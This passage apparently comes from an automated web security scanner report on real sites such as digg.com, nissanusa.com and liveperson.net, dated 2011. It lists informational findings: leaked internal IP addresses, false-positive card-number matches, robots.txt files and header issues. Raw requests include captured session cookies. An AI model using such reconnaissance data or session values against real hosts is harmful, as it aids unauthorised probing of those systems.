+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

22. Private IP addresses disclosed previous next
There are 2 instances of this issue:

/submit
/submit

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.128.190

Request

GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.2. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.128.186

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.128.186 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
...[SNIP]...

23. Credit card numbers disclosed previous next
There are 6 instances of this issue:

http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19
http://local.nissanusa.com/louisville-area
http://local.nissanusa.com/miami-area
http://local.nissanusa.com/nashville-area
http://local.nissanusa.com/new-york-area
http://local.nissanusa.com/sacramento-area

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

23.1. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.19

Issue detail

The following credit card number was disclosed in the response:

4677841363295

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 14:48:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33401

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
,_imp.creative.39942763";
this.thirdPartyFlashDisplayUrl = "";
this.thirdPartyBackupImpUrl = "";
this.surveyUrl = "http://js.dmtry.com/antenna2.js?0_471_4677841-363295_0";
this.googleContextDiscoveryUrl = "http://pagead2.googlesyndication.com/pagead/ads?client=dclk-3pas-query&output=xml&geo=true";
this.livePreviewSiteUrl = "%LivePrevi
...[SNIP]...

23.2. http://local.nissanusa.com/louisville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/louisville-area

Issue detail

The following credit card number was disclosed in the response:

4983267960337

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=40201; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Set-Cookie: localDMA=louisville-area; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Content-Length: 118285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
"hdnDealerZip":"42141","hdnCountryRegion":"US","hdnDealerPhone":"(270) 678-1300","hdnFax":"(270) 678-1557","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.goodmannissan.com\/","hdnDealerDistance":"85.4983267960337","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"false","hdnPrefered":"true","hdnExcellenceCode":"3","hdnExpressService":"false","hdnGTR":"false","hdnSTLatitude":"37.014971","hdnSTLongitude":"-
...[SNIP]...

23.3. http://local.nissanusa.com/miami-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/miami-area

Issue detail

The following credit card number was disclosed in the response:

4067065991938197

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33101; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Set-Cookie: localDMA=miami-area; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
alerZip":"33135","hdnCountryRegion":"US","hdnDealerPhone":"(305) 448-7431","hdnFax":"(305) 443-8757","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.maroonenissanofmiami.com\/","hdnDealerDistance":"3.4067065991938197","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"true","hdnPrefered":"true","hdnExcellenceCode":"1","hdnExpressService":"false","hdnGTR":"true","hdnSTLatitude":"25.7648054361763","hdnSTLongitud
...[SNIP]...

23.4. http://local.nissanusa.com/nashville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/nashville-area

Issue detail

The following credit card number was disclosed in the response:

5097695224832774

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=37201; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Set-Cookie: localDMA=nashville-area; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Content-Length: 119690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
hdnDealerZip":"37115","hdnCountryRegion":"US","hdnDealerPhone":"(615) 865-7220","hdnFax":"(615) 860-2036","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.nissanofrivergate.com","hdnDealerDistance":"7.5097695224832774","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"false","hdnPrefered":"true","hdnExcellenceCode":"1","hdnExpressService":"false","hdnGTR":"false","hdnSTLatitude":"36.2636053226187","hdnSTLongit
...[SNIP]...

23.5. http://local.nissanusa.com/new-york-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/new-york-area

Issue detail

The following credit card number was disclosed in the response:

36387327947486

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=10001; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Set-Cookie: localDMA=new-york-area; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Content-Length: 217093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
dnDealerZip":"18503","hdnCountryRegion":"US","hdnDealerPhone":"(570) 558-2000","hdnFax":"(570) 558-2010","hdnDealerEmail":"","hdnDealerUrl":"http:\/\/www.tomhessernissan.com\/","hdnDealerDistance":"98.36387327947486","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"false","hdnPrefered":"true","hdnExcellenceCode":"3","hdnExpressService":"false","hdnGTR":"false","hdnSTLatitude":"41.4104533905468","hdnSTLongit
...[SNIP]...

23.6. http://local.nissanusa.com/sacramento-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/sacramento-area

Issue detail

The following credit card number was disclosed in the response:

4025337027216

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=95814; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Set-Cookie: localDMA=sacramento-area; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Content-Length: 129688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
:"Address","hdnMatchedAddress":"100 Carriage Cir, Hemet, CA 92545-9610","hdnEditedLocationUTC":"","hdnEditedPropertyUTC":"","hdnInputModified":""},{"hdnLatitude":"-121.386436118168","hdnLongitude":"38.4025337027216","hdnEntityID":"932","hdnDealerId":"3773","hdnRegionCode":"44","hdnDistrict":"12","hdnDealerName":"NISSAN OF ELK GROVE","hdnDealerStreet":"8590 LAGUNA GROVE DR","hdnDealerCity":"ELK GROVE","hdnDealerS
...[SNIP]...
Distance":"13.788277579171012","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"true","hdnPrefered":"true","hdnExcellenceCode":"2","hdnExpressService":"false","hdnGTR":"true","hdnSTLatitude":"38.4025337027216","hdnSTLongitude":"-121.386436118168","hdnContactable":"true","hdnSalesphone":"","hdnServicephone":"(916) 405-5000","hdnSalesHours":"SUSU11001900:MOFR09002100:SASA09002000","hdnServiceHours":"SUSUCLOS
...[SNIP]...

24. Robots.txt file previous next
There are 2 instances of this issue:

http://ad.afy11.net/ad
https://tt3.zedo.com/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

24.1. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 16:39:29 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

24.2. https://tt3.zedo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://tt3.zedo.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tt3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 29 Jan 2011 01:41:21 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

25. Cacheable HTTPS response previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hcp/html/blankhtml.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

Request

GET /hcp/html/blankhtml.html HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/html
Content-Location: https://base.liveperson.net/hcp/html/blankhtml.html
Last-Modified: Thu, 30 Dec 2010 17:06:51 GMT
Accept-Ranges: bytes
ETag: "e28dbf343a8cb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 14:06:46 GMT

<html><body></body></html>

26. Multiple content types specified previous next
There are 3 instances of this issue:

http://base.liveperson.net/visitor/addons/deploy.asp
https://base.liveperson.net/hcp/html/chatConnLib.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://base.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/html
Content-type: application/x-javascript

Request

Response

26.2. https://base.liveperson.net/hcp/html/chatConnLib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hcp/html/chatConnLib.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: application/x-javascript
text/html; charset="+this.dataEncoding+"

Request

GET /hcp/html/chatConnLib.js HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Content-Length: 23454
Content-Type: application/x-javascript
Content-Location: https://base.liveperson.net/hcp/html/chatConnLib.js
Last-Modified: Thu, 30 Dec 2010 17:12:16 GMT
Accept-Ranges: bytes
ETag: "f2555cb544a8cb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 14:06:46 GMT

if(typeof Array.prototype.splice==='undefined'){Array.prototype.splice=function(a,c){var i=0,e=arguments,d=this.copy(),f=a;if(!c){c=this.length-a;}for(i;i<e.length-2;i++){this[a+i]=e[i+2];}for(a;a<thi
...[SNIP]...
<head>';out_str+="<meta http-equiv='Content-Type' content='text/html; charset="+this.dataEncoding+"'>";out_str+='</head>
...[SNIP]...

26.3. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/javascript
text/html;charset=iso-8859-1

Request

Response

27. HTML does not specify charset previous next
There are 144 instances of this issue:

http://a.tribalfusion.com/favicon.ico
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html
http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html
http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/
http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/
http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html
http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/
http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/
http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/
http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/
http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html
http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html
http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/
http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/
http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html
http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
http://ad.doubleclick.net/
http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191
http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2
http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048
http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7
http://ad.doubleclick.net/adi/N4319.msn/B2087123.382
http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5
http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7
http://amch.questionmarket.com/adscgen/st.php
http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg
http://b3.mookie1.com/2/B3DM/DLX/1@x71
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/
http://base.liveperson.net/visitor/addons/deploy.asp
https://base.liveperson.net/hcp/html/blankhtml.html
http://bh.heraldinteractive.com/includes/processAds.bg
http://boston30.autochooser.com/results.asp
http://br.imlive.com/NaN/
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.brightcove.com/services/messagebroker/amf
http://cafr.imlive.com/NaN/
http://common.onset.freedom.com/fi/adsense/
http://common.onset.freedom.com/fi/analytics/cms/
http://common.onset.freedom.com/oas/jx/
http://d3.zedo.com/jsc/d3/ff2.html
